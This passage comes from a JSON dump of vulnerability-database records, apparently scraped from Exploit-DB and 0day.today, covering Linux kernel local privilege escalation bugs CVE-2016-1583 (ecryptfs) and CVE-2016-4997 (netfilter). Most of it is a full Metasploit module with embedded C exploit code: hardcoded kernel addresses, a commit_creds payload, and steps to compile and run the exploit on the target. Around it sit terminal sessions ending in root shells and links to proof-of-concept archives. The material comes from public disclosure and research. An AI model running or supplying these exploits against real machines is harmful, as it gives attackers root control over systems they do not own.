exploit, in a VM with 4 cores, with Ubuntu 16.04 installed:\r\n\r\n```\r\nuser@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls\r\ncompile.sh exploit.c hello.c suidhelper.c\r\nuser@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./compile.sh \r\nuser@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls\r\ncompile.sh exploit exploit.c hello 
hello.c suidhelper suidhelper.c\r\nuser@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./exploit\r\nall spammers ready\r\nrecurser parent ready\r\nspam over\r\nfault chain set up, faulting now\r\nwriting stackframes\r\nstackframes written\r\nkilling 2494\r\npost-corruption code is alive!\r\nchildren should be dead\r\ncoredump handler set. recurser exiting.\r\ngoing to crash now\r\nsuid file detected, launching rootshell...\r\nwe have root privs now...\r\nroot@user-VirtualBox:/proc# id\r\nuid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)\r\n```\r\n\r\n(If the exploit crashes even with the right kernel version, try\r\nrestarting the machine. Also, ensure that no program like top/htop/...\r\nis running that might try to read process command lines. Note that\r\nthe PoC and the exploit don't really clean up after themselves and\r\nleave mountpoints behind that prevent them from re-running without\r\na reboot or manual unmounting.)\r\n\r\nNote that Ubuntu compiled their kernel with\r\nCONFIG_SCHED_STACK_END_CHECK turned on, making it harder than it used\r\nto be in the past to not crash the kernel while exploiting this bug,\r\nand an overwrite of addr_limit would be useless because at the\r\ntime the thread_info is overwritten, there are multiple instances of\r\nkernel_read() on the stack. Still, the bug is exploitable by carefully\r\naligning the stack so that the vital components of thread_info are\r\npreserved, stopping with an out-of-bounds stack pointer and\r\noverwriting the thread stack using a normal write to an adjacent\r\nallocation of the buddy allocator.\r\n\r\nRegarding the fix, I think the following would be reasonable:\r\n\r\n - Explicitly forbid stacking anything on top of procfs by setting its\r\n s_stack_depth to a sufficiently large value. 
In my opinion, there\r\n is too much magic going on inside procfs to allow stacking things\r\n on top of it, and there isn't any good reason to do it. (For\r\n example, ecryptfs invokes open handlers from a kernel thread\r\n instead of normal user process context, so the access checks inside\r\n VFS open handlers are probably ineffective - and procfs relies\r\n heavily on those.)\r\n\r\n - Forbid opening files with f_op->mmap==NULL through ecryptfs. If the\r\n lower filesystem doesn't expect to be called in pagefault-handling\r\n context, it probably shouldn't be called in that context.\r\n\r\n - Create a dedicated kernel stack cache outside of the direct mapping\r\n of physical memory that has a guard page (or a multi-page gap) at\r\n the bottom of each stack, and move the struct thread_info to a\r\n different place (if nothing else works, the top of the stack, above\r\n the pt_regs).\r\n While e.g. race conditions are more common than stack overflows in\r\n the Linux kernel, the whole vulnerability class of stack overflows\r\n is easy to mitigate, and the kernel is sufficiently complicated for\r\n unbounded recursion to emerge in unexpected places - or perhaps\r\n even for someone to discover a way to create a stack with a bounded\r\n length that is still too high. Therefore, I believe that guard\r\n pages are a useful mitigation.\r\n Nearly everywhere, stack overflows are caught using guard pages\r\n nowadays; this includes Linux userland, but also {### TODO ###}\r\n and, on 64-bit systems, grsecurity (using GRKERNSEC_KSTACKOVERFLOW).\r\n\r\nOh, and by the way: The `BUG_ON(task_stack_end_corrupted(prev))`\r\nin schedule_debug() ought to be a direct panic instead of an oops. 
At\r\nthe moment, when you hit it, you get a recursion between the scheduler\r\ninvocation in do_exit() and the BUG_ON in the scheduler, and the\r\nkernel recurses down the stack until it hits something sufficiently\r\nimportant to cause a panic.\r\n\r\nI'm going to send (compile-tested) patches for my first two fix\r\nsuggestions and the recursive oops bug. I haven't written a patch for\r\nthe guard pages mitigation - I'm not familiar enough with the x86\r\nsubsystem for that.\r\n\r\n\r\nNotes regarding the exploit:\r\n\r\nIt makes an invalid assumption that causes it to require at least around 6GB of RAM.\r\n\r\nIt has a trivially avoidable race that causes it to fail on single-core systems after overwriting the coredump handler; if this happens, it's still possible to manually trigger a coredump and execute the suid helper to get a root shell.\r\n\r\nThe page spraying is pretty primitive and racy; while it works reliably for me, there might be influencing factors that cause it to fail on other people's machines.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39992.zip\r\n\r\n", "cvss": {"score": 7.3, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:HIGH/I:HIGH/A:HIGH/"}, "sourceHref": "https://www.exploit-db.com/download/39992/"}, {"lastseen": "2016-09-28T01:29:56", "description": "Linux Kernel 4.6.3 - Netfilter Privilege Escalation (Metasploit). CVE-2016-4997. Local exploit for Lin_x86 platform. 
Tags: ", "published": "2016-09-27T00:00:00", "type": "exploitdb", "title": "Linux Kernel 4.6.3 - Netfilter Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "2016-09-27T00:00:00", "id": "EDB-ID:40435", "href": "https://www.exploit-db.com/exploits/40435/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire \"msf/core\"\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently\r\n only works against Ubuntu 16.04 (not 16.04.1) with kernel\r\n 4.4.0-21-generic.\r\n Several conditions have to be met for successful exploitation:\r\n Ubuntu:\r\n 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\r\n 2. 
libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\r\n Kernel 4.4.0-31-generic and newer are not vulnerable.\r\n\r\n We write the ascii files and compile on target instead of locally since metasm bombs for not\r\n having cdefs.h (even if locally installed)\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'h00die <mike@stcyrsecurity.com>', # Module\r\n 'vnik' # Discovery\r\n ],\r\n 'DisclosureDate' => 'Jun 03 2016',\r\n 'Platform' => [ 'linux'],\r\n 'Arch' => [ ARCH_X86 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [ 'Ubuntu', { } ]\r\n #[ 'Fedora', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'References' =>\r\n [\r\n [ 'EDB', '40049'],\r\n [ 'CVE', '2016-4997'],\r\n [ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c']\r\n ]\r\n ))\r\n register_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),\r\n OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]),\r\n OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]),\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n def iptables_loaded?()\r\n # user@ubuntu:~$ cat /proc/modules | grep ip_tables\r\n # ip_tables 28672 1 iptable_filter, Live 0x0000000000000000\r\n # x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000\r\n vprint_status('Checking if ip_tables is loaded in kernel')\r\n if target.name == \"Ubuntu\"\r\n iptables = cmd_exec('cat /proc/modules | grep ip_tables')\r\n if iptables.include?('ip_tables')\r\n vprint_good('ip_tables.ko is loaded')\r\n else\r\n print_error('ip_tables.ko is not loaded. 
root needs to run iptables -L or similar command')\r\n end\r\n return iptables.include?('ip_tables')\r\n elsif target.name == \"Fedora\"\r\n iptables = cmd_exec('cat /proc/modules | grep iptable_raw')\r\n if iptables.include?('iptable_raw')\r\n vprint_good('iptable_raw is loaded')\r\n else\r\n print_error('iptable_raw is not loaded. root needs to run iptables -L or similar command')\r\n end\r\n return iptables.include?('iptable_raw')\r\n else\r\n return false\r\n end\r\n end\r\n\r\n def shemsham_installed?()\r\n # we want this to be false.\r\n vprint_status('Checking if shem or sham are installed')\r\n shemsham = cmd_exec('cat /proc/cpuinfo')\r\n if shemsham.include?('shem')\r\n print_error('shem installed, system not vulnerable.')\r\n elsif shemsham.include?('sham')\r\n print_error('sham installed, system not vulnerable.')\r\n else\r\n vprint_good('shem and sham not present.')\r\n end\r\n return (shemsham.include?('shem') or shemsham.include?('sham'))\r\n end\r\n\r\n if iptables_loaded?() and not shemsham_installed?()\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.\r\n def has_prereqs?()\r\n vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')\r\n if target.name == \"Ubuntu\"\r\n lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')\r\n if lib.include?('install')\r\n vprint_good('libc6-dev-i386 is installed')\r\n else\r\n print_error('libc6-dev-i386 is not installed. Compiling will fail.')\r\n end\r\n multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib')\r\n if multilib.include?('install')\r\n vprint_good('gcc-multilib is installed')\r\n else\r\n print_error('gcc-multilib is not installed. 
Compiling will fail.')\r\n end\r\n gcc = cmd_exec('which gcc')\r\n if gcc.include?('gcc')\r\n vprint_good('gcc is installed')\r\n else\r\n print_error('gcc is not installed. Compiling will fail.')\r\n end\r\n return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install')\r\n elsif target.name == \"Fedora\"\r\n lib = cmd_exec('dnf list installed | grep -E \\'(glibc-devel.i686|libgcc.i686)\\'')\r\n if lib.include?('glibc')\r\n vprint_good('glibc-devel.i686 is installed')\r\n else\r\n print_error('glibc-devel.i686 is not installed. Compiling will fail.')\r\n end\r\n if lib.include?('libgcc')\r\n vprint_good('libgcc.i686 is installed')\r\n else\r\n print_error('libgcc.i686 is not installed. Compiling will fail.')\r\n end\r\n multilib = false #not implemented\r\n gcc = false #not implemented\r\n return (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib\r\n else\r\n return false\r\n end\r\n end\r\n\r\n compile = false\r\n if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'\r\n if has_prereqs?()\r\n compile = true\r\n vprint_status('Live compiling exploit on system')\r\n else\r\n vprint_status('Dropping pre-compiled exploit on system')\r\n end\r\n end\r\n if check != CheckCode::Appears\r\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! 
punt!')\r\n end\r\n\r\n desc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n env_ready_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n pwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\r\n payload_file = rand_text_alpha(8)\r\n payload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\"\r\n\r\n # direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here\r\n # removed #include <netinet/in.h> per busterb comment in PR 7326\r\n decr = %q{\r\n #define _GNU_SOURCE\r\n #include <stdio.h>\r\n #include <stdlib.h>\r\n #include <string.h>\r\n #include <unistd.h>\r\n #include <sched.h>\r\n #include <netinet/in.h>\r\n #include <linux/sched.h>\r\n #include <errno.h>\r\n #include <sys/types.h>\r\n #include <sys/socket.h>\r\n #include <sys/ptrace.h>\r\n #include <net/if.h>\r\n #include <linux/netfilter_ipv4/ip_tables.h>\r\n #include <linux/netlink.h>\r\n #include <fcntl.h>\r\n #include <sys/mman.h>\r\n\r\n #define MALLOC_SIZE 66*1024\r\n\r\n int decr(void *p) {\r\n int sock, optlen;\r\n int ret;\r\n void *data;\r\n struct ipt_replace *repl;\r\n struct ipt_entry *entry;\r\n struct xt_entry_match *ematch;\r\n struct xt_standard_target *target;\r\n unsigned i;\r\n\r\n sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);\r\n\r\n if (sock == -1) {\r\n perror(\"socket\");\r\n return -1;\r\n }\r\n\r\n data = malloc(MALLOC_SIZE);\r\n\r\n if (data == NULL) {\r\n perror(\"malloc\");\r\n return -1;\r\n }\r\n\r\n memset(data, 0, MALLOC_SIZE);\r\n\r\n repl = (struct ipt_replace *) data;\r\n repl->num_entries = 1;\r\n repl->num_counters = 1;\r\n repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;\r\n repl->valid_hooks = 0;\r\n\r\n entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));\r\n entry->target_offset = 74; // overwrite target_offset\r\n entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);\r\n\r\n 
ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));\r\n\r\n strcpy(ematch->u.user.name, \"icmp\");\r\n void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);\r\n uint64_t *me = (uint64_t *)(kmatch + 0x58);\r\n *me = 0xffffffff821de10d; // magic number!\r\n\r\n uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);\r\n *match = (uint32_t)kmatch;\r\n\r\n ematch->u.match_size = (short)0xffff;\r\n\r\n target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);\r\n uint32_t *t = (uint32_t *)target;\r\n *t = (uint32_t)kmatch;\r\n\r\n printf(\"[!] Decrementing the refcount. This may take a while...\\n\");\r\n printf(\"[!] Wait for the \\\"Done\\\" message (even if you'll get the prompt back).\\n\");\r\n\r\n for (i = 0; i < 0xffffff/2+1; i++) {\r\n ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);\r\n }\r\n\r\n close(sock);\r\n free(data);\r\n printf(\"[+] Done! Now run ./pwn\\n\");\r\n\r\n return 0;\r\n }\r\n\r\n int main(void) {\r\n void *stack;\r\n int ret;\r\n\r\n printf(\"netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\\n\");\r\n\r\n ret = unshare(CLONE_NEWUSER);\r\n\r\n if (ret == -1) {\r\n perror(\"unshare\");\r\n return -1;\r\n }\r\n\r\n stack = (void *) malloc(65536);\r\n\r\n if (stack == NULL) {\r\n perror(\"malloc\");\r\n return -1;\r\n }\r\n\r\n clone(decr, stack + 65536, CLONE_NEWNET, NULL);\r\n\r\n sleep(1);\r\n\r\n return 0;\r\n }\r\n }\r\n\r\n # direct copy of code from exploit-db\r\n pwn = %q{\r\n #include <stdio.h>\r\n #include <string.h>\r\n #include <errno.h>\r\n #include <unistd.h>\r\n #include <stdint.h>\r\n #include <fcntl.h>\r\n #include <sys/mman.h>\r\n #include <assert.h>\r\n\r\n #define MMAP_ADDR 0xff814e3000\r\n #define MMAP_OFFSET 0xb0\r\n\r\n typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);\r\n typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t 
cred);\r\n\r\n void __attribute__((regparm(3))) privesc() {\r\n commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;\r\n prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;\r\n commit_creds(prepare_kernel_cred((uint64_t)NULL));\r\n }\r\n\r\n int main() {\r\n void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);\r\n assert(payload == (void *)MMAP_ADDR);\r\n\r\n void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);\r\n\r\n memset(shellcode, 0, 0x300000);\r\n\r\n void *ret = memcpy(shellcode, &privesc, 0x300);\r\n assert(ret == shellcode);\r\n\r\n printf(\"[+] Escalating privs...\\n\");\r\n\r\n int fd = open(\"/dev/ptmx\", O_RDWR);\r\n close(fd);\r\n\r\n assert(!getuid());\r\n\r\n printf(\"[+] We've got root!\");\r\n\r\n return execl(\"/bin/bash\", \"-sh\", NULL);\r\n }\r\n }\r\n\r\n # the original code printed a line. However, this is hard to detect due to threading.\r\n # so instead we can write a file in /tmp to catch.\r\n decr.gsub!(/printf\\(\"\\[\\+\\] Done\\! 
Now run \\.\\/pwn\\\\n\"\\);/,\r\n \"int fd2 = open(\\\"#{env_ready_file}\\\", O_RDWR|O_CREAT, 0777);close(fd2);\" )\r\n\r\n # patch in to run our payload\r\n pwn.gsub!(/execl\\(\"\\/bin\\/bash\", \"-sh\", NULL\\);/,\r\n \"execl(\\\"#{payload_path}\\\", NULL);\")\r\n\r\n def pwn(payload_path, pwn_file, pwn, compile)\r\n # lets write our payload since everythings set for priv esc\r\n vprint_status(\"Writing payload to #{payload_path}\")\r\n write_file(payload_path, generate_payload_exe)\r\n cmd_exec(\"chmod 555 #{payload_path}\")\r\n register_file_for_cleanup(payload_path)\r\n\r\n # now lets drop part 2, and finish up.\r\n rm_f pwn_file\r\n if compile\r\n print_status \"Writing pwn executable to #{pwn_file}.c\"\r\n rm_f \"#{pwn_file}.c\"\r\n write_file(\"#{pwn_file}.c\", pwn)\r\n cmd_exec(\"gcc #{pwn_file}.c -O2 -o #{pwn_file}\")\r\n register_file_for_cleanup(\"#{pwn_file}.c\")\r\n else\r\n print_status \"Writing pwn executable to #{pwn_file}\"\r\n write_file(pwn_file, pwn)\r\n end\r\n register_file_for_cleanup(pwn_file)\r\n cmd_exec(\"chmod +x #{pwn_file}; #{pwn_file}\")\r\n end\r\n\r\n if not compile # we need to override with our pre-created binary\r\n # pwn file\r\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')\r\n fd = ::File.open( path, \"rb\")\r\n pwn = fd.read(fd.stat.size)\r\n fd.close\r\n # desc file\r\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')\r\n fd = ::File.open( path, \"rb\")\r\n decr = fd.read(fd.stat.size)\r\n fd.close\r\n\r\n # overwrite the hardcoded variable names in the compiled versions\r\n env_ready_file = '/tmp/okDjTFSS'\r\n payload_path = '/tmp/2016_4997_payload'\r\n end\r\n\r\n # check for shortcut\r\n if datastore['REEXPLOIT']\r\n pwn(payload_path, pwn_file, pwn, compile)\r\n else\r\n rm_f desc_file\r\n if compile\r\n print_status \"Writing desc executable to #{desc_file}.c\"\r\n rm_f \"#{desc_file}.c\"\r\n 
write_file(\"#{desc_file}.c\", decr)\r\n register_file_for_cleanup(\"#{desc_file}.c\")\r\n output = cmd_exec(\"gcc #{desc_file}.c -m32 -O2 -o #{desc_file}\")\r\n else\r\n write_file(desc_file, decr)\r\n end\r\n rm_f env_ready_file\r\n register_file_for_cleanup(env_ready_file)\r\n #register_file_for_cleanup(desc_file)\r\n if not file_exist?(desc_file)\r\n vprint_error(\"gcc failure output: #{output}\")\r\n fail_with(Failure::Unknown, \"#{desc_file}.c failed to compile\")\r\n end\r\n if target.name == \"Ubuntu\"\r\n vprint_status \"Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created.\"\r\n elsif target.name == \"Fedora\"\r\n vprint_status \"Executing #{desc_file}, may take around 80s to finish. Watching for #{env_ready_file} to be created.\"\r\n end\r\n cmd_exec(\"chmod +x #{desc_file}; #{desc_file}\")\r\n sec_waited = 0\r\n\r\n until sec_waited > datastore['MAXWAIT'] do\r\n Rex.sleep(1)\r\n if sec_waited % 10 == 0\r\n vprint_status(\"Waited #{sec_waited}s so far\")\r\n end\r\n\r\n if file_exist?(env_ready_file)\r\n print_good(\"desc finished, env ready.\")\r\n pwn(payload_path, pwn_file, pwn, compile)\r\n return\r\n end\r\n sec_waited +=1\r\n end\r\n end\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40435/"}, {"lastseen": "2016-10-10T21:29:24", "description": "Linux kernel 4.6.2 - IP6T_SO_SET_REPLACE Privilege Escalation. CVE-2016-4997. 
Local exploit for Lin_x86-64 platform", "published": "2016-10-10T00:00:00", "type": "exploitdb", "title": "Linux kernel 4.6.2 - IP6T_SO_SET_REPLACE Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "2016-10-10T00:00:00", "id": "EDB-ID:40489", "href": "https://www.exploit-db.com/exploits/40489/", "sourceData": "# Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call\r\n# Date: 2016.10.8\r\n# Exploit Author: Qian Zhang@MarvelTeam Qihoo 360\r\n# Version: Linux kernel <= 4.6.2\r\n# Tested on: Ubuntu 16.04.1 LTS Linux 4.4.0-21-generic\r\n# CVE: CVE-2016-4997\r\n# Reference:http://www.openwall.com/lists/oss-security/2016/09/29/10\r\n# Contact: tyrande000@gmail.com\r\n\r\n#DESCRIPTION\r\n#===========\r\n#The IPv6 netfilter subsystem in the Linux kernel through 4.6.2 does not validate certain offset fields,\r\n#which allows local users to escalade privileges via an IP6T_SO_SET_REPLACE compat setsockopt call with ip6_tables module loaded.\r\n\r\nzhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ls\r\ncompile.sh enjoy enjoy.c pwn pwn.c version.h\r\nzhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ sudo modprobe ip6_tables\r\n[sudo] password for zhang_q: \r\nzhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ./pwn \r\npwn begin, let the bullets fly . . .\r\nand wait for a minute . . .\r\npwn over, let's enjoy!\r\npreparing payload . . .\r\ntrigger modified tty_release . . 
.\r\ngot root, enjoy :)\r\nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# \r\nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# id\r\nuid=0(root) gid=0(root) groups=0(root)\r\nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# hostnamectl \r\n Static hostname: ubuntu\r\n Icon name: computer-vm\r\n Chassis: vm\r\n Machine ID: 355cdf4ce8a048288640c2aa933c018f\r\n Virtualization: vmware\r\n Operating System: Ubuntu 16.04.1 LTS\r\n Kernel: Linux 4.4.0-21-generic\r\n Architecture: x86-64\r\nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# \r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40489.zip", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40489/"}], "zdt": [{"lastseen": "2018-03-19T05:21:05", "edition": 2, "description": "Exploit for linux platform in category local exploits", "published": "2016-06-21T00:00:00", "type": "zdt", "title": "Linux - ecryptfs and /proc/$pid/environ Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1583"], "modified": "2016-06-21T00:00:00", "id": "1337DAY-ID-25603", "href": "https://0day.today/exploit/description/25603", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=836\r\n \r\nStacking filesystems, including ecryptfs, protect themselves against\r\ndeep nesting, which would lead to kernel stack overflow, by tracking\r\nthe recursion depth of filesystems. E.g. in ecryptfs, this is\r\nimplemented in ecryptfs_mount() as follows:\r\n \r\n s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;\r\n \r\n rc = -EINVAL;\r\n if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {\r\n pr_err(\"eCryptfs: maximum fs stacking depth exceeded\\n\");\r\n goto out_free;\r\n }\r\n \r\n \r\nThe files /proc/$pid/{mem,environ,cmdline}, when read, access the\r\nuserspace memory of the target process, involving, if necessary,\r\nnormal pagefault handling. 
If it was possible to mmap() them, an\r\nattacker could create a chain of e.g. /proc/$pid/environ mappings\r\nwhere process 1 has /proc/2/environ mapped into its environment area,\r\nprocess 2 has /proc/3/environ mapped into its environment area and so\r\non. A read from /proc/1/environ would invoke the pagefault handler for\r\nprocess 1, which would invoke the pagefault handler for process 2 and\r\nso on. This would, again, lead to kernel stack overflow.\r\n \r\n \r\nOne interesting fact about ecryptfs is that, because of the encryption\r\ninvolved, it doesn't just forward mmap to the lower file's mmap\r\noperation. Instead, it has its own page cache, maintained using the\r\nnormal filemap helpers, and performs its cryptographic operations when\r\ndirty pages need to be written out or when pages need to be faulted\r\nin. Therefore, not just its read and write handlers, but also its mmap\r\nhandler only uses the lower filesystem's read and write methods.\r\nThis means that using ecryptfs, you can mmap [decrypted views of]\r\nfiles that normally wouldn't be mappable.\r\n \r\nCombining these things, it is possible to trigger recursion with\r\narbitrary depth where:\r\n \r\na reading userspace memory access in process A (from userland or from\r\n copy_from_user())\r\ncauses a pagefault in an ecryptfs mapping in process A, which\r\ncauses a read from /proc/{B}/environ, which\r\ncauses a pagefault in an ecryptfs mapping in process B, which\r\ncauses a read from /proc/{C}/environ, which\r\ncauses a pagefault in an ecryptfs mapping in process C, and so on.\r\n \r\nOn systems with the /sbin/mount.ecryptfs_private helper installed\r\n(e.g. Ubuntu if the \"encrypt my home directory\" checkbox is ticked\r\nduring installation), this bug can be triggered by an unprivileged\r\nuser. 
The mount helper considers /proc/$pid, where $pid is the PID of\r\na process owned by the user, to be a valid mount source because the\r\ndirectory is \"owned\" by the user.\r\n \r\nI have attached both a generic crash PoC and a build-specific exploit\r\nthat can be used to gain root privileges from a normal user account on\r\nUbuntu 16.04 with kernel package linux-image-4.4.0-22-generic, version\r\n4.4.0-22.40, uname \"Linux user-VirtualBox 4.4.0-22-generic #40-Ubuntu\r\nSMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\".\r\n \r\ndmesg output of the crasher:\r\n \r\n```\r\n[ 80.036069] BUG: unable to handle kernel paging request at fffffffe4b9145c0\r\n[ 80.040028] IP: [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] PGD 1e0d067 PUD 0 \r\n[ 80.040028] Thread overran stack, or stack corrupted\r\n[ 80.040028] Oops: 0000 [#1] SMP \r\n[ 80.040028] Modules linked in: vboxsf drbg ansi_cprng xts gf128mul dm_crypt snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi vboxvideo snd_seq ttm snd_seq_device drm_kms_helper snd_timer joydev drm snd fb_sys_fops soundcore syscopyarea sysfillrect sysimgblt vboxguest input_leds i2c_piix4 8250_fintek mac_hid serio_raw parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci e1000 pata_acpi fjes video\r\n[ 80.040028] CPU: 0 PID: 2135 Comm: crasher Not tainted 4.4.0-22-generic #40-Ubuntu\r\n[ 80.040028] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006\r\n[ 80.040028] task: ffff880035443200 ti: ffff8800d933c000 task.ti: ffff8800d933c000\r\n[ 80.040028] RIP: 0010:[<ffffffff810c9a33>] [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] RSP: 0000:ffff88021fc03d70 EFLAGS: 00010046\r\n[ 80.040028] RAX: 000000000000dc68 RBX: ffff880035443260 RCX: ffffffffd933c068\r\n[ 80.040028] RDX: ffffffff81e50560 RSI: 000000000013877a RDI: ffff880035443200\r\n[ 80.040028] RBP: ffff88021fc03d70 R08: 0000000000000000 R09: 
0000000000010000\r\n[ 80.040028] R10: 0000000000002d4e R11: 00000000000010ae R12: ffff8802137aa200\r\n[ 80.040028] R13: 000000000013877a R14: ffff880035443200 R15: ffff88021fc0ee68\r\n[ 80.040028] FS: 00007fbd9fadd700(0000) GS:ffff88021fc00000(0000) knlGS:0000000000000000\r\n[ 80.040028] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 80.040028] CR2: fffffffe4b9145c0 CR3: 0000000035415000 CR4: 00000000000006f0\r\n[ 80.040028] Stack:\r\n[ 80.040028] ffff88021fc03db0 ffffffff810b4b83 0000000000016d00 ffff88021fc16d00\r\n[ 80.040028] ffff880035443260 ffff8802137aa200 0000000000000000 ffff88021fc0ee68\r\n[ 80.040028] ffff88021fc03e30 ffffffff810bb414 ffff88021fc03dd0 ffff880035443200\r\n[ 80.040028] Call Trace:\r\n[ 80.040028] <IRQ> \r\n[ 80.040028] [<ffffffff810b4b83>] update_curr+0xe3/0x160\r\n[ 80.040028] [<ffffffff810bb414>] task_tick_fair+0x44/0x8e0\r\n[ 80.040028] [<ffffffff810b1267>] ? sched_clock_local+0x17/0x80\r\n[ 80.040028] [<ffffffff810b146f>] ? sched_clock_cpu+0x7f/0xa0\r\n[ 80.040028] [<ffffffff810ad35c>] scheduler_tick+0x5c/0xd0\r\n[ 80.040028] [<ffffffff810fe560>] ? 
